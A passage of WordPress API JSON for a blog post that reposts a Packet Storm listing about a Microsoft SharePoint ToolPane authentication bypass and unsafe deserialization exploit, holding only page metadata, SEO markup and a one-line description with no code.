21;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212316\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:59&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for Microsoft SharePoint server that chains authentication bypass with unsafe deserialization to achieve complete system compromise without authentication&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft SharePoint Server&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-28311","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass \/ Unsafe Deserialization_PACKETSTORM:212316 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28311\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass \/ Unsafe Deserialization_PACKETSTORM:212316 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:59&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for Microsoft SharePoint server that chains authentication bypass with unsafe deserialization to achieve complete system compromise without authentication&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft SharePoint Server...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28311\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-02T15:33:26+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28311#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28311\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass \\\/ Unsafe Deserialization_PACKETSTORM:212316\",\"datePublished\":\"2025-12-02T15:33:26+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28311\"},\"wordCount\":2609,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28311#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28311\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28311\",\"name\":\"\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass \\\/ Unsafe Deserialization_PACKETSTORM:212316 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-02T15:33:26+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28311#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28311\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28311#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass \\\/ Unsafe Deserialization_PACKETSTORM:212316\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass \/ Unsafe Deserialization_PACKETSTORM:212316 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=28311","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass \/ Unsafe Deserialization_PACKETSTORM:212316 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:59&#8243;,&#8221;description&#8221;:&#8221;Proof of concept exploit for Microsoft SharePoint server that chains authentication bypass with unsafe deserialization to achieve complete system compromise without authentication&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft SharePoint Server...","og_url":"https:\/\/zero.redgem.net\/?p=28311","og_site_name":"zero redgem","article_published_time":"2025-12-02T15:33:26+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=28311#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=28311"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass \/ Unsafe Deserialization_PACKETSTORM:212316","datePublished":"2025-12-02T15:33:26+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=28311"},"wordCount":2609,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=28311#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=28311","url":"https:\/\/zero.redgem.net\/?p=28311","name":"\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass \/ Unsafe Deserialization_PACKETSTORM:212316 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-02T15:33:26+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=28311#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=28311"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=28311#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft SharePoint Server ToolPane Authentication Bypass \/ Unsafe Deserialization_PACKETSTORM:212316"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28311","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28311"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28311\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28311"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28311"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=28311"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}